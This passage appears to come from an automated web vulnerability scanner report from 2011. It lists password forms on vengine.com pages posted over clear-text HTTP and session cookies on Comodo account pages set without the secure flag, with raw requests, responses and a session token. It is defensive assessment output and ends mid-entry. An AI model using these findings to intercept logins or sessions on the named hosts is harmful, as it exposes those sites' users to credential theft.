Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252787086.1679413329.1316363998.1316363998.1316363998.1; __utmb=252787086.2.10.1316363998; __utmc=252787086; __utmz=252787086.1316363998.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:39:14 GMT
Content-Type: text/html
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 15834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Int
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.8. http://www.vengine.com/products/overview.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/overview.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /products/overview.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:10 GMT
Content-Type: text/html
Content-Length: 10595
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Phishing Attacks
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.9. http://www.vengine.com/products/prove_it.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/prove_it.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /products/prove_it.html HTTP/1.1
Host: www.vengine.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/corporate/contact.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252787086.1679413329.1316363998.1316363998.1316363998.1; __utmb=252787086.6.10.1316363998; __utmc=252787086; __utmz=252787086.1316363998.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:39:55 GMT
Content-Type: text/html
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 12353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Int
...[SNIP]...
<div id="login" style="top: 46px;">

<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">


Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.10. http://www.vengine.com/products/tour.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/tour.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /products/tour.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:11 GMT
Content-Type: text/html
Content-Length: 12345
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Ban
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.11. http://www.vengine.com/products/vengine/eula.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/eula.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /products/vengine/eula.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:05 GMT
Content-Type: text/html
Content-Length: 18642
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Int
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.12. http://www.vengine.com/products/vengine/faq.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/faq.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /products/vengine/faq.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:09 GMT
Content-Type: text/html
Content-Length: 14577
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Sit
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.13. http://www.vengine.com/products/vengine/first_time.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/first_time.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /products/vengine/first_time.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:07 GMT
Content-Type: text/html
Content-Length: 10909
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Internet Security
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.14. http://www.vengine.com/products/vengine/help.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/help.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /products/vengine/help.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:04 GMT
Content-Type: text/html
Content-Length: 12152
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Internet Fraudste
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.15. http://www.vengine.com/products/vengine/index.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/index.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /products/vengine/index.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:38:37 GMT
Content-Type: text/html
Content-Length: 11866
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Site Authenticati
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.16. http://www.vengine.com/products/vengine/options.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/options.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /products/vengine/options.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:07 GMT
Content-Type: text/html
Content-Length: 11277
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Anti Phishin
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.17. http://www.vengine.com/products/vengine/requirements.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/requirements.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /products/vengine/requirements.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:05 GMT
Content-Type: text/html
Content-Length: 10780
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Installing Verifi
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.18. http://www.vengine.com/products/vengine/setup.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/setup.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /products/vengine/setup.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:06 GMT
Content-Type: text/html
Content-Length: 11624
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Download Anti Phi
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.19. http://www.vengine.com/products/vengine/ssl_feedback.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/ssl_feedback.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /products/vengine/ssl_feedback.html HTTP/1.1
Host: www.vengine.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/products/vengine/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252787086.1679413329.1316363998.1316363998.1316363998.1; __utmb=252787086.9.10.1316363998; __utmc=252787086; __utmz=252787086.1316363998.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:42:53 GMT
Content-Type: text/html
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 11376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>SSL Certificates
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.20. http://www.vengine.com/products/vengine/uninstall.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/uninstall.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /products/vengine/uninstall.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:08 GMT
Content-Type: text/html
Content-Length: 10248
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Download Ant
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.21. http://www.vengine.com/sitemap.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /sitemap.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /sitemap.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:16 GMT
Content-Type: text/html
Content-Length: 11070
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Sitemap - Anti Ph
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.22. http://www.vengine.com/support/faq.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /support/faq.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /support/faq.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:13 GMT
Content-Type: text/html
Content-Length: 15273
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Int
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.23. http://www.vengine.com/support/index.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /support/index.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /support/index.html HTTP/1.1
Host: www.vengine.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/products/free_tools.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252787086.1679413329.1316363998.1316363998.1316363998.1; __utmb=252787086.3.10.1316363998; __utmc=252787086; __utmz=252787086.1316363998.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:39:23 GMT
Content-Type: text/html
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 9986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Int
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

3. SSL cookie without secure flag set  previous  next
There are 7 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


3.1. https://accounts.comodo.com/cfp/management/signup  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://accounts.comodo.com
Path:   /cfp/management/signup

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cfp/management/signup HTTP/1.1
Host: accounts.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:03:57 GMT
Server: Apache
ETag: "f6420706d003e74fc9d717cc1e190b50"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _comodo_sasp_session=01e1085565732cbc99b7e85823fa75c7; path=/; HttpOnly
Content-Length: 48761
Status: 200
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...

3.2. https://accounts.comodo.com/cfp/management/terms  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://accounts.comodo.com
Path:   /cfp/management/terms

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cfp/management/terms HTTP/1.1
Host: accounts.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:03:59 GMT
Server: Apache
ETag: "3ecf7266c3a18f0a58b96482ba0e28e8"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _comodo_sasp_session=01e1085565732cbc99b7e85823fa75c7; path=/; HttpOnly
Content-Length: 40640
Status: 200
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<pre>
END USER LICENSE AND SUBSCRIBER AGREEMENT
Comodo Internet Security


IMPORTANT ... PLEASE READ THESE TERMS CAREFULLY BEFORE DOWNLOADING, INS
...[SNIP]...

3.3. https://accounts.comodo.com/esm/management/signup  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://accounts.comodo.com
Path:   /esm/management/signup

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /esm/management/signup HTTP/1.1
Host: accounts.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:04:01 GMT
Server: Apache
ETag: "b6b570bb3f1631ef9ea8a2a76928b0ca"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _comodo_sasp_session=01e1085565732cbc99b7e85823fa75c7; path=/; HttpOnly
Content-Length: 66118
Status: 200
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...

3.4. https://accounts.comodo.com/login  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://accounts.comodo.com
Path:   /login

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login HTTP/1.1
Host: accounts.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:03:59 GMT
Server: Apache
ETag: "6ec6b2f81215f905c8a500b7a070476b"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _comodo_sasp_session=01e1085565732cbc99b7e85823fa75c7; path=/; HttpOnly
Content-Length: 6189
Status: 200
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

3.5. https://www.panopticsecurity.com/Comodo/index.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.panopticsecurity.com
Path:   /Comodo/index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Comodo/index.jsp?partner=Comodo HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://hackerguardian.com/hackerguardian/qa_sa_wizard.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.panopticsecurity.com
Connection: Keep-Alive

Response

